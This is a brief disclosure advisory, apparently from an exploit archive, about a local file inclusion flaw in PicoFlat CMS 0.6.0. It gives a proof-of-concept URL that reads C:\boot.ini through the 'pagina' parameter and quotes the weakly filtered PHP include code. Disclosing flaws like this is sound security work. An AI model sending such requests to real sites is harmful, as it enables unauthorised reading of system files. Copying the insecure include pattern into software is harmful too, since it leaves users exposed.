PicoFlat CMS version 0.6.0 suffers from a local file inclusion vulnerability. Same vulnerability that versions 0.5.9 and below have suffered from, but the author has not addressed the issue.
be39d259037011ebda49a434732a9d22ced666d117df6cc76288f04614322a43
PicoFlatCMS 0.6.0 LFI
http://www.sourceforge.net/projects/picoflatcms
Same old thing:
http://site/index.php?pagina=C:\boot.ini
Fixme:
if (eregi("\:\/\/", $pagina) || eregi("\?", $pagina)) {
$pagina = "";
include "notfound.php";
}else{
include $pagina;
}